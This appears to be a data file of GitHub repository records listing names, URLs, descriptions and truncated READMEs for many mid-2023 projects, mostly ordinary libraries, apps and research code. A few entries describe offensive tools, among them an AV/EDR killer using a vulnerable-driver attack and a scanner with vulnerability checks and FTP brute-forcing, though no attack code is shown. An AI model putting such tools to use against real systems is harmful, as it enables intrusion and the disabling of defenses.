full_name
stringlengths
9
72
url
stringlengths
28
91
description
stringlengths
3
343
readme
stringlengths
1
207k
kaixindelele/ChatSensitiveWords
https://github.com/kaixindelele/ChatSensitiveWords
利用LLM+敏感词库,来自动判别是否涉及敏感词。
# ChatSensitiveWords 利用LLM+敏感词库,来自动判别是否涉及敏感词。已经在[chatpaper](https://chatwithpaper.org)上线! # Motivation: 在[chatpaper](https://chatwithpaper.org)中,我们免费提供了[学术版GPT](https://github.com/binary-husky/gpt_academic)完整功能,这里面有一个隐藏的对话功能,我们希望给大家提供一个学术对话接口,但防不住大家好奇,或者有极少数人故意攻击我们的输出。 因此我们需要紧急上线敏感词检测。尤其是针对政治敏感词和色情敏感词。 # 方案: 1. 传统敏感...
Xposed-Modules-Repo/com.unexpected.th
https://github.com/Xposed-Modules-Repo/com.unexpected.th
电报助手
# Telegram Helper - 电报助手 # 注意 - 此项目已经停止维护 --- ![image](https://github.com/Xposed-Modules-Repo/com.unexpected.th/blob/main/1559808980192.jpg)
verytinydever/react-copy-mailto
https://github.com/verytinydever/react-copy-mailto
null
## react-copy-mailto <!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section --> [![All Contributors](https://img.shields.io/badge/all_contributors-2-orange.svg?style=flat-square)](#contributors-) <!-- ALL-CONTRIBUTORS-BADGE:END --> [![npm version](https://badge.fury.io/js/react-copy-mailto.svg)](http...
nicholaschiasson/fcidr
https://github.com/nicholaschiasson/fcidr
Fragmented Classless Inter-Domain Routing (FCIDR)
# fcidr [![crates.io](https://img.shields.io/crates/v/fcidr)](https://crates.io/crates/fcidr) Fragmented Classless Inter-Domain Routing (FCIDR) A library exposing a data structure to represent a set of CIDR ranges as well as an interface to compute set operations over CIDRs. This data structure can be applied, for ...
junhoyeo/react-threads
https://github.com/junhoyeo/react-threads
Embed Static Threads in your React/Next.js application. UI components for Meta's Threads.
# react-threads [![NPM](https://img.shields.io/npm/v/react-threads.svg?style=flat-square&labelColor=black)](https://www.npmjs.com/package/react-threads) [![MIT License](https://img.shields.io/badge/license-MIT-blue?style=flat-square&labelColor=black)](https://github.com/junhoyeo/react-threads/blob/main/license) [![Pre...
surqing/-Autox.js-
https://github.com/surqing/-Autox.js-
通过安装安卓端的autox.js,执行本项目的脚本,实现自动监测大麦,自动演唱会门票
# -Autox.js- 通过安装安卓端的[autox.js](https://github.com/kkevsekk1/AutoX),执行本项目的脚本,实现自动监测大麦,自动抢演唱会门票 ## 实际抢票过程中会遇到其他的错误或者异常信息没有做处理,感兴趣的朋友欢迎继续完善 ### 抢票的难度很大,请不要抱有太大希望,该脚本仅用于学习autoxjs # 食用方法 1. 安装适合你的安卓手机的autoxjs 2. 在autoxjs中新建一个.js脚本文件 3. 将最新版本的本脚本复制进.js文件中 4. 按照脚本中的注释修改脚本 5. 进入到等待抢购的页面 6. 返回脚本,点击执行即可 # 声明 该脚本仅为个人用于学习的项目,...
VolkanSah/The-Code-Interpreter-in-OpenAI-ChatGPT
https://github.com/VolkanSah/The-Code-Interpreter-in-OpenAI-ChatGPT
The code interpreter is a tool developed by OpenAI to execute programming code in an interactive environment. It is capable of running Python code and displaying the results in real-time.
# Exploring the Code Interpreter in OpenAI ChatGPT 4 The code interpreter is an advanced feature of OpenAI's ChatGPT that brings a new level of interactivity to the AI model. It is designed to execute Python code in a sandboxed environment and provide real-time results, making it a powerful tool for a wide range of ...
weiwosuoai/WeBlog
https://github.com/weiwosuoai/WeBlog
📗 Spring Boot + Vue 3.2 + Vite 前后端分离博客~ 感谢点个 Star 呀~
# WeBlog ## 简介 一款由 Spring Boot + Vue 3.2 + Vite 4.3 开发的前后端分离博客。 ![Weblog 后台仪表盘](https://img.quanxiaoha.com/quanxiaoha/168887767469647 "Weblog 后台仪表盘") - 后端采用 Spring Boot 、Mybatis Plus 、MySQL 、Spring Sericuty、JWT、Minio、Guava 等; - 后台管理基于 Vue 3.2 + Vite + Element Plus 纯手动搭建的管理后台,未采用任何 Admin 框架; - 支持博客 Markdown 格式发布与编辑、...
horsefacts/trading-days
https://github.com/horsefacts/trading-days
A Uniswap v4 hook that reverts when markets are closed in New York.
# 🗽 trading-days ![Build Status](https://github.com/horsefacts/trading-days/actions/workflows/.github/workflows/test.yml/badge.svg?branch=main) A Uniswap v4 hook that reverts when markets are closed in New York. ## Views - `isCoreTradingHours`: Return `true` between 9:30 AM and 4:00 PM ET. - `isTradingDay`: Return...
Ambershawl656/AM
https://github.com/Ambershawl656/AM
null
Real Time Operating System Lessons using Arduino and The FreeRTOS Kernel learning arduino examples atmel freertos learning-exercise arduino-boards arduino-platform example-project arduino-uno rtos arduino-mega example-repo example-codes# AM
mierenhoop/advent-of-beans
https://github.com/mierenhoop/advent-of-beans
null
# Advent of beans Advent of code clone built with [Redbean](https://redbean.dev/). ## Status *I will pause development on this project because it is currently in a working state. I did not plan to create actual puzzles and host an event, therefore adding new features might be a waste of time. If anyone is interested...
Venusdev2113/javascript-serveral-animation-effect
https://github.com/Venusdev2113/javascript-serveral-animation-effect
I made the project including a lot of animation effect.
# javascript-serveral-animation-effect I made the project including a lot of animation effect.
lablab-ai/Google-VertexAI-FastAPI
https://github.com/lablab-ai/Google-VertexAI-FastAPI
Simple boilerplate to get started with Generative AI models from Google Vertex AI based on FastAPI
# Getting started with Vertex AI Generative AI ## Before you begin This is a simple starter boilerplate that gives you a basic FastAPI setup with a few endpoints. It is meant to be used as a starting point for your own projects. ### Clone and install dependencies In your terminal, run the following commands: ``` g...
DeepGraphLearning/ProtST
https://github.com/DeepGraphLearning/ProtST
Camera-ready repo for ProtST
# ProtST: Multi-Modality Learning of Protein Sequences and Biomedical Texts ProtST is an advanced pretraining framework for protein sequence understanding and prediction, as introduced in our [ICML2023 oral paper](https://arxiv.org/abs/2301.12040). It is designed to enhance protein sequence pre-training and understand...
CarlJamison/cosmic-air-host
https://github.com/CarlJamison/cosmic-air-host
Store entire html pages in a single url
Compresses and creates a link for simple, self-contained html sites. Imagine a scenario where you have a quick proof of concept or cool visual that you want to show to someone, but don't feel like hosting it anywhere. For example, something like [this](https://carljamison.github.io/TimeKiller/). You can use this pro...
luolin-ai/FastGPT-Enterprise-WeChatbot
https://github.com/luolin-ai/FastGPT-Enterprise-WeChatbot
基于企微gpt知识库的bot机器人,能够自动回复企业微信中收到的消息。这个机器人能够处理私聊和群聊,还可以记住与用户的聊天内容,从而做出更加贴合上下文的回应。此外,您还可以设置白名单来控制机器人与哪些用户或群组交互。如需对接自己的知识库网站WX:aiwis99
# FastGPT-Enterprise-WeChatbot # Enterprise-WeChat-GPTbot 基于企业微信外部群的微信机器人,支持FASTgpt # 企业微信机器人使用教程: 1.打开项目下载企业微信4.0.8.6027版本 下载:https://drive.weixin.qq.com/s?k=ANMA2gc2ACsWAjgBOT 如需对接自己的知识库网站WX:gojiberrys 2.配置, 打开https://fastgpt.run/网站,点击创建ai ![image](https://github.com/luolin-ai/Enterprise-WeChat-GPTbot/assets/135555...
nickrosh/evol-teacher
https://github.com/nickrosh/evol-teacher
Open Source WizardCoder Dataset
# Evol-Teacher: Recreating WizardCoder This repo implements the code generation instruction process described in the [WizardCoder Paper](https://arxiv.org/pdf/2306.08568.pdf). Currently, WizardCoder is one the most performant Code Generation models, being beaten only by ChatGPT. This takes the Code Alpaca 20k dataset ...
juri/Parse3339
https://github.com/juri/Parse3339
A fast pure Swift RFC 3339 timestamp parser
[![Build](https://github.com/juri/Parse3339/actions/workflows/build.yml/badge.svg)](https://github.com/juri/Parse3339/actions/workflows/build.yml) [![](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2Fjuri%2FParse3339%2Fbadge%3Ftype%3Dswift-versions)](https://swiftpackageindex....
jinhoyoo/summarize_youtube_video_lecture
https://github.com/jinhoyoo/summarize_youtube_video_lecture
Summarize Youtube's script by chapter creater configured
# Youtube Script Summarizer ## Overview Youtube Script Summarizer is a tool that helps summarize YouTube scripts by chapter creators. It leverages the youtube-transcript-api, langchain, and OpenAI packages to achieve this. ## How it works The youtube-transcript-api package is used to extract the script from a YouT...
Moexin/IPTV
https://github.com/Moexin/IPTV
MyIPTV
Auto Update IPTV in 2023-08-02 08:42:04 CST
renegadevi/nuxt-boilerplate
https://github.com/renegadevi/nuxt-boilerplate
A ready to use Nuxt 3 boilerplate. (w/ Tailwind, i18n, Pinia, GDPR, Dark mode, TypeScript etc.)
# Nuxt Boilerplate A ready to use Nuxt 3 boilerplate **Demo**: https://nuxt-boilerplate.onrender.com/ ![screenshot](https://github.com/renegadevi/nuxt-boilerplate/blob/e806bae6efec29a19579d7cf76ef683ffe980917/.github/screenshot.png) ![lighthouse](https://github.com/renegadevi/nuxt-boilerplate/blob/e806bae6efec29a195...
NowScott/IndWebIndex
https://github.com/NowScott/IndWebIndex
Individual Web Index.
# Individual Web Index [![data update][data-update-image]][data-update-url] [![GitHub stars][stars-image]][stars-url] [![GitHub forks][forks-image]][forks-url] [![license GPL-3.0][license-image]][license-url] [![commit-count-permonth][commit-image]][commit-url] [![contributors-count][contributors-image]][contributors...
flare-ai/customGPT-template
https://github.com/flare-ai/customGPT-template
Mercury - Train your own custom GPT. Chat with any file, or website.
<h1 align="center">Mercury</h4> <h4 align="center"> <img width="800" src="https://github.com/jacobvo888/readme-assets/blob/main/merc-search.png" alt=""> </h4> <h4 align="center"> <img width="200" src="https://github.com/jacobvo888/readme-assets/blob/main/logo-down-indigo.webp" alt=""> </h4> ## Chat with any Docume...
sd-fabric/fabric
https://github.com/sd-fabric/fabric
null
# FABRIC: Personalizing Diffusion Models with Iterative Feedback [Paper](https://arxiv.org/abs/2307.10159) | [Website](https://sd-fabric.github.io/) | [Colab](https://colab.research.google.com/drive/1rWZ4jQHMvjc-l7xYAssa_OUOaAx3XDQT?usp=sharing) | [Gradio](https://colab.research.google.com/drive/12pFi6WAKASG18uH3UcxGM...
verytinydever/covid-19-bot-updater
https://github.com/verytinydever/covid-19-bot-updater
null
Bot that gives covid-19 update
crowsonkb/dice-mc
https://github.com/crowsonkb/dice-mc
DiCE: The Infinitely Differentiable Monte-Carlo Estimator
# dice-mc Implements [DiCE: The Infinitely Differentiable Monte-Carlo Estimator](https://arxiv.org/abs/1802.05098) in PyTorch. DiCE is a surrogate loss for the score function estimator (REINFORCE), an unbiased Monte Carlo estimator of the gradient and higher-order derivatives (Hessian etc.) of the expectation of the ...
arthurgeek/vaultwarden-fly-template
https://github.com/arthurgeek/vaultwarden-fly-template
Template to deploy Vaultwarden on Fly.io with websockets support and sqlite hourly backups
# Template for deploying [Vaultwarden] on [Fly.io] This is a template for deploying [Vaultwarden] on [Fly.io] with [Caddy](https://caddyserver.com) for [websockets] support and [supercronic](https://github.com/aptible/supercronic) for hourly [restic](https://restic.net) backups with e-mail failure notification via [ms...
kendryte/k230_sdk
https://github.com/kendryte/k230_sdk
Kendryte K230 SDK
# 嘉楠勘智K230 SDK [![Github repository](https://img.shields.io/badge/github-repository-blue?logo=github&style=plastic)](https://github.com/kendryte/k230_docs) [![Gitee repository](https://img.shields.io/badge/gitee-repository-blue?logo=gitee&style=plastic)](https://gitee.com/kendryte/k230_docs) [![GitHub release](https:/...
dongyx/lnn
https://github.com/dongyx/lnn
A Command-Line Program of Feedforward Neural Networks
LNN === LNN (Little Neural Network) is a command-line program of feedforward neural networks aiming to **make easy tasks easily done**. The following Unix pipeline trains a network to sum real numbers. $ seq 1024 \ | awk '{x=rand(); y=rand(); print x,y,x+y}' \ | lnn train -Cq2i1i -i1024 >model.nn The trained mode...
saagarjha/Presentations
https://github.com/saagarjha/Presentations
Slides and resources for talks I've given
# Presentations Slides and resources for talks I've given
OpenGVLab/InternLMM
https://github.com/OpenGVLab/InternLMM
null
# InternLMM ![](multimodal_1.png) ![](multimodal_2.png)
hako-mikan/sd-webui-cd-tuner
https://github.com/hako-mikan/sd-webui-cd-tuner
Color/Detail control for Stable Diffusion web-ui
# CD(Color/Detail) Tuner Color/Detail control for Stable Diffusion web-ui/色調や書き込み量を調節するweb-ui拡張です。 [日本語](#使い方) Update 2023.07.13.0030(JST) - add brightness - color adjusting method is changed - add disable checkbox ![](https://raw.githubusercontent.com/hako-mikan/sd-webui-cd-tuner/imgs/sample0.png) This is an exten...
okatu-loli/Baoding-Electricity-Tracker
https://github.com/okatu-loli/Baoding-Electricity-Tracker
null
# Baoding-Electricity-Tracker Baoding-Electricity-Tracker是一个基于Python编写的自动化程序,能够帮助用户查询河北省保定市的每日电费,同时支持通过飞书和ServerChan等平台发送电费通知。 ## 功能介绍 - **自动化查询**:自动定时登录网页,获取电费数据,无需人工干预。 - **数据API**:通过Flask Web服务器,提供API接口,可以随时查询当前电费。 - **阈值通知**:当电费低于用户设定的阈值时,程序会自动发送通知。 - **执行通知**:可以设定在每次查询执行后发送通知,无论电费是否达到阈值。 - **多平台支持**:目前支持飞书和Serv...
zoogie/Kartminer7
https://github.com/zoogie/Kartminer7
Use Mario Kart 7 as a blue shell to take control of your 3DS
# Kartminer BETA ## Thanks - wwylele for [save3ds](https://github.com/wwylele/save3ds) Installing the exploit to extdata from just seedminer and a PC would be impossible without this tool. - PabloMK7 for [3dsropxploitinjector](https://github.com/PabloMK7/3dsropxploitinjector) which makes tricky exploits like this muc...
nelson-liu/lost-in-the-middle
https://github.com/nelson-liu/lost-in-the-middle
Code and data for "Lost in the Middle: How Language Models Use Long Contexts"
# Lost in the Middle: How Language Models Use Long Contexts This repository contains accompanying material for [Lost in the Middle: How Language Models Use Long Contexts](https://arxiv.org/abs/2307.03172). ## Table of Contents - [Installation](#installation) - [Multi-Document Question Answering Experiments](#multi-d...
MrTalentDev/AtEM-backend
https://github.com/MrTalentDev/AtEM-backend
null
# AtEMkart Full-Stack AtEMkart with Admin Dashboard & Paytm Payment Gateway. ### How to run -> - #### clone the entire repo - #### cd AtEMkart - #### npm install - #### cd client - #### npm install - #### cd.. - #### npm run dev ### Node version: 16.20.0
maiqingqiang/go-orm-helper
https://github.com/maiqingqiang/go-orm-helper
🚀🚀 A GoLand plugin that automatically provides database field completion, tags, and generates Structs for writing ORM code. Supports: Gorm、Xorm、Beego、GoFrame, etc. ⭐️ Star to support our work!一个为了让你在 Goland 上写 ORM 能自动补全数据库字段、Tag、生成Struct 的插件。支持:Gorm、Xorm、Beego、GoFrame...)请给个 ⭐️Star 支持我们的工作吧!
English | [简体中文](./README-zh_CN.md) | [日本語](./README-ja_JP.md) | [한국어](./README-ko_KR.md) <div align="center"> <img src="https://blog.johnmai.top/go-orm-helper/src/main/resources/icons/icon64x64.svg" alt="Go ORM Helper"/> <h1 align="center">Go ORM Helper</h1> </div> <p align="center">A GoLand plugin that auto...
aras-p/UnityGPUTexCompression
https://github.com/aras-p/UnityGPUTexCompression
How to do DXT/BCn texture compression in Unity using compute shaders
# Realtime DXT/BCn compression, in Unity, on the GPU Small testbed to see how compute shaders can be used to do texture compression _on the GPU_ in Unity. ![Screenshot](/screenshot.png?raw=true "Screenshot") ### Outline of how to do GPU texture compression: 1. Input is any 2D texture (regular texture, render textur...
simonw/llm-mpt30b
https://github.com/simonw/llm-mpt30b
LLM plugin adding support for the MPT-30B language model
# llm-mpt30b [![PyPI](https://img.shields.io/pypi/v/llm-mpt30b.svg)](https://pypi.org/project/llm-mpt30b/) [![Changelog](https://img.shields.io/github/v/release/simonw/llm-mpt30b?include_prereleases&label=changelog)](https://github.com/simonw/llm-mpt30b/releases) [![Tests](https://github.com/simonw/llm-mpt30b/workflow...
AGiXT/hub
https://github.com/AGiXT/hub
Hub for Open Source AGiXT Extensions, Chains, Prompts, and Agents.
[![GitHub](https://img.shields.io/badge/GitHub-Sponsor%20Josh%20XT-blue?logo=github&style=plastic)](https://github.com/sponsors/Josh-XT) [![PayPal](https://img.shields.io/badge/PayPal-Sponsor%20Josh%20XT-blue.svg?logo=paypal&style=plastic)](https://paypal.me/joshxt) [![Ko-Fi](https://img.shields.io/badge/Kofi-Sponsor%2...
ALX-SE-Algorithmia/Demo-Project
https://github.com/ALX-SE-Algorithmia/Demo-Project
Our first demo project we will be working on together, to test collaboration skills and solidify our collaboration methods for future projects. In this project, we build a basic C Calculator program.
# Demo Project - Calculator Welcome to our first demo project aimed at testing collaboration skills. In this project, we will build a basic calculator in C and any other programming language of your choice. The goal is to enhance your knowledge of the C programming language while demonstrating effective collaboration ...
riatelab/dicopal.js
https://github.com/riatelab/dicopal.js
Discrete color palettes (hundreds of them!) for JavaScript
# Dicopal **Di**screte **co**lor **pal**ettes (*hundreds of them!*) for JavaScript. ![palettes](./palettes.png) > Dicopal offers color palettes from: > - [Colorbrewer2](https://colorbrewer2.org/) > - [Fabio Crameri's Scientific Colour Maps](https://www.fabiocrameri.ch/colourmaps/) > - [CARTOColors](https://carto.co...
zideliu/StyleDrop-PyTorch
https://github.com/zideliu/StyleDrop-PyTorch
Unoffical implement for [StyleDrop](https://arxiv.org/abs/2306.00983)
# StyleDrop <p align="left"> <a href="https://huggingface.co/spaces/zideliu/styledrop"><img alt="Huggingface" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-StyleDrop-orange"></a> <a href="https://replicate.com/cjwbw/styledrop"><img src="https://replicate.com/cjwbw/styledrop/badge"></a> <a href=...
m1guelpf/threads-re
https://github.com/m1guelpf/threads-re
Reverse-engineering Instagram's Threads private APIs.
# How Threads Works This repository contains my notes and discoveries while reverse-engineering Threads app. Feel free to PR if you've found something new, or to build clients with this info (with credit ofc 😉). ## Web (threads.net) The web version of Threads is currently read-only, so not much can be learned about...
Helixo32/NimBlackout
https://github.com/Helixo32/NimBlackout
Kill AV/EDR leveraging BYOVD attack
# NimBlackout [![Nim Version](https://img.shields.io/badge/nim-1.6.8-orange.svg)](https://nim-lang.org/) > **Note**: This project is for educational purposes only. The use of this code for any malicious activity is strictly prohibited. I am not responsible for any misuse of this software. NimBlackout is an adaptatio...
Xmingbai/Minisforum-UM560-UM580-APU-Hackintosh
https://github.com/Xmingbai/Minisforum-UM560-UM580-APU-Hackintosh
null
# Minisforum-UM560XT/UM560/UM580-Hackintosh-APU 基于小兵大佬的引导修改而来:https://github.com/daliansky/minisforum-UM560XT-Hackintosh B站测评链接:https://www.bilibili.com/video/BV13X4y1W7ru # 使用不同config可适用于Minisforum UM560/UM560XT/UM580(下载看右边界面的Releases) ![](https://github.com/Xmingbai/Minisforum-UM560XT-APU-Hackintosh/blob/main/EFI.p...
m1guelpf/threads-api
https://github.com/m1guelpf/threads-api
Reverse-engineered Rust client for Instagram's Threads app.
# Instagram Threads API [![Crates.io](https://img.shields.io/crates/v/threads-api.svg)](https://crates.io/crates/threads-api) [![Docs.rs](https://docs.rs/threads-api/badge.svg)](https://docs.rs/threads-api) [![MIT licensed](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE) > Unofficial, Reverse-Engineered ...
surprisetalk/blogs.hn
https://github.com/surprisetalk/blogs.hn
tiny directory of tech blogs
# [blogs.hn](https://blogs.hn) [blogs.hn](https://blogs.hn) is for _personal_ blogs! Non-technical blogs are okay too, but remember that the community is mostly folks from [HackerNews](https://news.ycombinator.com). ## Adding Blogs This repo comes with a helper script `fetch.js` to automatically grab blog info from ...
Byxs20/PuzzleSolver
https://github.com/Byxs20/PuzzleSolver
一款针对CTF竞赛MISC的工具~
# PuzzleSolver 一款针对CTF竞赛MISC的工具~ # Q&A Q: ``` [*] cloacked-pixel执行失败! Traceback (most recent call last): File "core\ErrorCore\errorCore.py", line 13, in wrapper File "core\BruteForce\Cloacked_Pixel_Func\cloacked_pixel.py", line 75, in BruteForceLSB File "magic\magic.py", line 71, in __init__ File "magic\magic.py", ...
NUST-Machine-Intelligence-Laboratory/HVC
https://github.com/NUST-Machine-Intelligence-Laboratory/HVC
null
# HVC (Dynamic in Static: Hybrid Visual Correspondence for Self-Supervised Video Object Segmentation) >This repository is the official PyTorch implementation of the paper "**Dynamic in Static: Hybrid Visual Correspondence for Self-Supervised Video Object Segmentation**" ## Abstract >Conventional video object segmenta...
seifrajhi/awesome-cilium
https://github.com/seifrajhi/awesome-cilium
A curated list of awesome projects related to cilium
# Awesome Cilium [![Awesome](https://awesome.re/badge.svg)](https://github.com/sindresorhus/awesome) > A curated list of awesome projects related to Cilium. Cilium is an open-source networking project that provides networking and security capabilities for containerized applications, microservices, and virtual machine...
verytinydever/AGE_Application
https://github.com/verytinydever/AGE_Application
null
REAMD ME
Shirley-WeiVi/ShirleyAi-NlpCorpusViews
https://github.com/Shirley-WeiVi/ShirleyAi-NlpCorpusViews
ShirleyAi专用NLP语料视图工具,它可以用于编辑、管理、导出不同格式或更新语料库。
# ShirleyAi-专用语料管理工具 ### 使用提要 该应用属于手动标注工具,并不能批量导入,ShirleyAi的目的是把我女朋友ai化,和女朋友聊天总有难以解释的语句或语法,该工具的目的是收集管理和女朋友的聊天对话,通过手动录入对话片段上下文,通过接口导出训练数据集。 如果你发现了有提取微信聊天记录的方式,不妨告诉我,我可以在里面内置提取入口, qq群: 1130531420 演示视频: https://www.bilibili.com/video/BV1Wk4y1P76W/ 新功能演示: https://www.bilibili.com/video/BV1U14y1R7pQ ### 功能说明 ...
Prajwal0225/Booking_Application
https://github.com/Prajwal0225/Booking_Application
null
# Booking_Application ![image](https://github.com/Prajwal0225/Booking_Application/assets/103810119/dd3cf42f-c295-4ae3-80df-d979a2f5a849) --- ## Usage - Register: Users can create an account by providing their name, email, and password. Passwords are securely encrypted. ![Register page](https://github.com/Prajwal...
lemonlove7/EHole_magic
https://github.com/lemonlove7/EHole_magic
EHole(棱洞)魔改。可对识别出来的重点资产进行漏洞检测(支持从hunter和fofa中提取资产)支持对ftp服务识别及爆破
# EHole_magic 在进行web打点时,信息收集中对目标进行指纹识别是必不可少的一个环节,使用EHole识别出来的重点资产还要用其他漏洞利用工具去检测,非常的不方便,在原本的基础上加了个漏洞检测功能。提打点的效率。(不影响原版功能的使用) # 运行流程 对资产进行指纹识别-->重点资产进行漏洞检测-->如:http://www.xxx.com存在通达OA--> 对通达OA漏洞进行扫描->对ftp服务进行暴力破解 <img width="679" alt="image" src="https://github.com/lemonlove7/EHole_magic/assets/56328995/86acca48-90af...
genabdulrehman/coffee-app
https://github.com/genabdulrehman/coffee-app
null
# coffe_app A new Flutter project. ## Project Overview https://github.com/genabdulrehman/coffee-app/assets/76816147/c3f97a22-6cc3-43a1-b51e-8d42e73949f1
mkazemiraz/one-line-javascript-utility-codes
https://github.com/mkazemiraz/one-line-javascript-utility-codes
✅ A collection of useful one-line JavaScript utility codes.
# One-line JavaScript Utility Codes ![One-line JavaScript Utility Codes](./assets/cover.png) [![Open Source Helpers](https://www.codetriage.com/mkazemiraz/one-line-javascript-utility-codes/badges/users.svg)](https://www.codetriage.com/mkazemiraz/one-line-javascript-utility-codes) If you like this content, you can pi...
baranacikgoz/PaginatedSearchAndFilter
https://github.com/baranacikgoz/PaginatedSearchAndFilter
A lightweight and flexible library designed to provide advanced search and advanced filter functionality along with pagination for .NET Core applications.
# PaginatedSearchAndFilter PaginatedSearchAndFilter is a lightweight and flexible library designed to provide search and filter functionality for paginated data in your .NET applications. It simplifies the implementation of search and filter features in your API endpoints, allowing you to offer advanced filtering and ...
ryanlintott/ILikeToMoveIt
https://github.com/ryanlintott/ILikeToMoveIt
Accessible move actions for SwiftUI Lists and easy custom drag and drop for older iOS
<picture> <source srcset="https://github.com/ryanlintott/ILikeToMoveIt/assets/2143656/fb28d9e9-7e1c-4c05-9f00-130daf64a513" media="(prefers-color-scheme: dark)"> <img width="600" src="https://github.com/ryanlintott/ILikeToMoveIt/assets/2143656/e7df51f5-f74a-4d3e-ad03-a13b77c305a9"> </picture> [![Swift Compatibili...
dermavan/callme-
https://github.com/dermavan/callme-
null
# callme-
malbertzard/inline-fold.nvim
https://github.com/malbertzard/inline-fold.nvim
A neovim version of the inline fold plugin
# inline-fold.nvim `inline-fold.nvim` is a Neovim plugin inspired by the vscode plugin `inline-fold`. It provides a convenient way to define patterns in files that get concealed inline. This can be used for many things for example for CSS classes in HTML files especially with TailwindCSS **Note: It doesn't work for m...
Athlon007/Leomard
https://github.com/Athlon007/Leomard
A Lemmy client for macOS
# Leomard [![](https://img.shields.io/github/downloads/Athlon007/Leomard/total)](https://github.com/Athlon007/Leomard/releases) [![](https://img.shields.io/github/v/release/Athlon007/Leomard?include_prereleases)](https://github.com/Athlon007/Leomard/releases) [![](https://img.shields.io/github/license/Athlon007/Leoma...
aswin2108/Portfolio
https://github.com/aswin2108/Portfolio
Welcome to my online resume
## My Portfolio Welcome to my [portfolio](https://aswin2108.github.io/Portfolio/)! This project showcases my skills, projects, and contributions. It serves as an online resume and a platform to highlight my accomplishments. Do star the repo if you liked it...! ## Table of Contents - [My Portfolio](#my-portfolio) - [...
abacaj/code-eval
https://github.com/abacaj/code-eval
Run evaluation on LLMs using human-eval benchmark
# code-eval ## What This is a repo I use to run human-eval on code models, adjust as needed. Some scripts were adjusted from wizardcoder repo ([process_eval.py](https://github.com/nlpxucan/WizardLM/blob/main/WizardCoder/src/process_humaneval.py)). The evaluation code is duplicated in several files, mostly to handle e...
iamlooper/VIC
https://github.com/iamlooper/VIC
Your personalized conversational companion with dynamic personas, changeable conversational style and real-time information.
![VIC](https://github.com/iamlooper/VIC/raw/main/vic.png) # VIC (Versatile Intelligent Chatbot) 🧠 Your personalized conversational companion with dynamic personas, changeable conversational style and real-time information. ## Download 📲 You can download VIC from the following: - [Play Store](https://play.google.com...
yamoo9/ssafy-react-2023
https://github.com/yamoo9/ssafy-react-2023
React 모듈형 특강 - 삼성 청년 아카데미 2023. 7
# SSAFY, React 삼성 청년 아카데미, React 모듈형 특강 (2023. 7)
bschaatsbergen/dnsee
https://github.com/bschaatsbergen/dnsee
Check DNS configurations quickly
# dnsee [![Release](https://github.com/bschaatsbergen/dnsee/actions/workflows/goreleaser.yaml/badge.svg)](https://github.com/bschaatsbergen/dnsee/actions/workflows/goreleaser.yaml) ![GitHub release (latest SemVer)](https://img.shields.io/github/v/release/bschaatsbergen/dnsee) ![GitHub commits since latest release (by ...
roipoussiere/jaffle
https://github.com/roipoussiere/jaffle
An hybrid yaml/node editor for Tidal Cycles, based on Strudel.
# Jaffle **J**ust **a**nother **f**lat **f**ile **l**ivecoding **e**nvironment. <img style="display: block; margin: auto;" src="./website/static/images/jaffle_logo_128.png"/> Check out the [demo website](https://roipoussiere.frama.io)! ## Introduction Jaffle is an hybrid yaml/node editor for [Tidal-cycles](https:/...
TechTitan0624/next-proejct-good
https://github.com/TechTitan0624/next-proejct-good
null
# An open source live screen share and webcam video recorder - [An open source live screen share and webcam video recorder](#an-open-source-live-screen-share-and-webcam-video-recorder) - [Deploy your instance](#deploy-your-instance) - [Features](#features) - [Contributions](#contributions) - [Requirements](#...
tetrzim/diffusion-human-feedback
https://github.com/tetrzim/diffusion-human-feedback
Censored Sampling of Diffusion Models Using 3 Minutes of Human Feedback
# Censored Sampling of Diffusion Models Using 3 Minutes of Human Feedback This is the codebase for [**Censored Sampling of Diffusion Models Using 3 Minutes of Human Feedback**](https://arxiv.org/abs/2307.02770). This repository is based on [openai/guided-diffusion](https://github.com/openai/guided-diffusion) and incl...
X-D-Lab/MindChat
https://github.com/X-D-Lab/MindChat
🐋MindChat(漫谈): 心理大模型
<h1 align="center">🐋MindChat(漫谈): 心理大模型</h1> <p align="center"> <a href="https://github.com/X-D-Lab/MindChat"><img src="https://img.shields.io/badge/GitHub-24292e" alt="github"></a> <a href="https://huggingface.co/X-D-Lab"><img src="https://img.shields.io/badge/-HuggingFace-yellow" alt="HuggingFace"></a> <a href="htt...
binghe001/spring-redis
https://github.com/binghe001/spring-redis
📚 基于Redis解决缓存击穿、穿透和雪崩问题的通用解决方案,拿来即用。支持存储对象、集合、简单数据类型等。无需提前将数据存入Redis,直接使用提供的分布式缓存接口查询数据即可,附带完善的单元测试用例,方便学习使用。
## 作者简介 - :dog: 互联资深技术专家,[TVP腾讯云最具价值专家](https://cloud.tencent.com/tvp/member/669)、数据库技术专家,分布式与微服务架构专家,全网45万+粉互联网技术博主。 - :bus: 作品:[`BingheGuide | 冰河指南`](https://github.com/binghe001/BingheGuide) | [`《深入理解高并发编程:核心原理与案例实战》`](https://github.com/binghe001/mykit-concurrent-principle) | [`《深入理解高并发编程:JDK核心技术》`](https://github...
0x4D31/detection-and-response-pipeline
https://github.com/0x4D31/detection-and-response-pipeline
✨ A compilation of suggested tools/services for each component in a detection and response pipeline, along with real-world examples. The purpose is to create a reference hub for designing effective threat detection and response pipelines. 👷 🏗
# Detection and Response Pipeline ✨ A compilation of suggested tools for each component in a detection and response pipeline, along with real-world examples. The purpose is to create a reference hub for designing effective threat detection and response pipelines. 👷 🏗 Join us, explore the curated content, and contrib...
xl-alt/free_gpt4
https://github.com/xl-alt/free_gpt4
国内 镜像网站 免费提供api支持,仅供个人使用,
## GPT-4-free-api ### 简介 > ❗️免费API Key仅可用于个人非商业用途,教育,非营利性科研工作中。严禁商用,严禁大规模训练商用模型! > 该网站和api高度重视隐私,致力于保护其用户的隐私。该项目不会以任何方式收集、记录或存储用户输入的任何文本或由 OpenAI 服务器返回的任何文本。该项目不会向 OpenAI 或任何第三方提供有关 API 调用者的身份的任何信息,所有文本消息 均保存在本地。 但OpenAI官方会根据其[数据使用政策](https://platform.openai.com/docs/data-usage-policies)保留 30 天的数据。 #### 👏广告 [国内镜...
imadeanaccount1/wasteof.plus
https://github.com/imadeanaccount1/wasteof.plus
WIP browser extension that adds cool, customizable addons to the wasteof.money social media. ⭐
